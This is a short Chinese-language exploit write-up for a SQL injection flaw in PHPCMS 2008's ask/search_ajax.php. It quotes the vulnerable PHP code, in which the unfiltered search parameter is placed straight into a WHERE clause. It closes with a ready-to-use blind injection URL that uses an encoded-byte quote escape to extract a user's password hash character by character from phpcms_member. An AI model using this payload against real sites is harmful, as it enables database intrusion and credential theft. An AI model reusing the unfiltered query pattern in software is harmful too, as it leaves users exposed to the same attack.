phpcms_phpcms2008,注入漏洞,利用分析

这个是最新有人发现的

该漏洞文件:ask/search_ajax.php

漏洞说明:

/ask/search_ajax.php

Code:

if($q)

{

$where = " title LIKE "%$q%" AND status = 5";//没做过滤直接感染了$where

}

else

{

exit("null");

}

$infos = $ask->listinfo($where, "askid DESC", "", 10);

/ask/include/answer.class.php

Code:

function listinfo($where = "", $order = "", $page = 1, $pagesize = 50)

{

if($where) $where = " WHERE $where";

if($order) $order = " ORDER BY $order";

$page = max(intval($page), 1);

$offset = $pagesize*($page-1);

$limit = " LIMIT $offset, $pagesize";

$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");

$number = $r["number"];

$this->pages = pages($number, $page, $pagesize);

$array = array();

$i = 1;

$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");

while($r = $this->db->fetch_array($result))

{

$r["orderid"] = $i;

$array[] = $r;

$i++;

}

$this->number = $this->db->num_rows($result);

$this->db->free_result($result);

return $array;

}

测试方法:

复制代码代码如下:

/ask/search_ajax.php?q=s%D5"/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23